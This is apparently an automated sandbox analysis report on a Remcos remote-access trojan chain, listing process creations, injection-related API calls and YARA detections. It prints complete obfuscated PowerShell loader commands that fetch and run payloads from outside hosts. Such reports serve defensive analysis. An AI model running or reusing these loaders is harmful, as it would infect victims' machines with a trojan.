                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthineJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,12_2_00417245
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041ACD1 OpenProcess,NtSuspendProcess,CloseHandle,12_2_0041ACD1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041ACFD OpenProcess,NtResumeProcess,CloseHandle,12_2_0041ACFD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004016FD NtdllDefWindowProc_A,14_2_004016FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004017B7 NtdllDefWindowProc_A,14_2_004017B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00402CAC NtdllDefWindowProc_A,15_2_00402CAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00402D66 NtdllDefWindowProc_A,15_2_00402D66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004158B9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00CA76587_2_00CA7658
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004520E212_2_004520E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041D08112_2_0041D081
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043D0A812_2_0043D0A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043716012_2_00437160
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004361BA12_2_004361BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0042626412_2_00426264
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043138712_2_00431387
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043652C12_2_0043652C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041E5EF12_2_0041E5EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044C74912_2_0044C749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004367D612_2_004367D6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004267DB12_2_004267DB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043C9ED12_2_0043C9ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00432A5912_2_00432A59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00436A9D12_2_00436A9D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CC1C12_2_0043CC1C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00436D5812_2_00436D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434D3212_2_00434D32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CE4B12_2_0043CE4B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00440E3012_2_00440E30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426E8312_2_00426E83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00412F4512_2_00412F45
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00452F1012_2_00452F10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426FBD12_2_00426FBD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1001719412_2_10017194
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1000B5C112_2_1000B5C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044B04013_2_0044B040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043610D13_2_0043610D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044731013_2_00447310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044A49013_2_0044A490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040755A13_2_0040755A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043C56013_2_0043C560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044B61013_2_0044B610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044D6C013_2_0044D6C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004476F013_2_004476F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044B87013_2_0044B870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044081D13_2_0044081D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041495713_2_00414957
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004079EE13_2_004079EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00407AEB13_2_00407AEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044AA8013_2_0044AA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00412AA913_2_00412AA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00404B7413_2_00404B74
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00404B0313_2_00404B03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044BBD813_2_0044BBD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00404BE513_2_00404BE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00404C7613_2_00404C76
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00415CFE13_2_00415CFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00416D7213_2_00416D72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00446D3013_2_00446D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00446D8B13_2_00446D8B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00406E8F13_2_00406E8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0040503814_2_00405038
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0041208C14_2_0041208C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004050A914_2_004050A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0040511A14_2_0040511A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0043C13A14_2_0043C13A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004051AB14_2_004051AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0044930014_2_00449300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0040D32214_2_0040D322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0044A4F014_2_0044A4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0043A5AB14_2_0043A5AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0041363114_2_00413631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0044669014_2_00446690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0044A73014_2_0044A730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004398D814_2_004398D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004498E014_2_004498E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0044A88614_2_0044A886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0043DA0914_2_0043DA09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00438D5E14_2_00438D5E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00449ED014_2_00449ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0041FE8314_2_0041FE83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00430F5414_2_00430F54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004050C215_2_004050C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004014AB15_2_004014AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0040513315_2_00405133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004051A415_2_004051A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0040124615_2_00401246
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0040CA4615_2_0040CA46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0040523515_2_00405235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004032C815_2_004032C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0040168915_2_00401689
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00402F6015_2_00402F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433FC0 appears 55 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 40 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004338B5 appears 40 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00416760 appears 69 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2063
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2030
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2063Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2030Jump to behavior
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
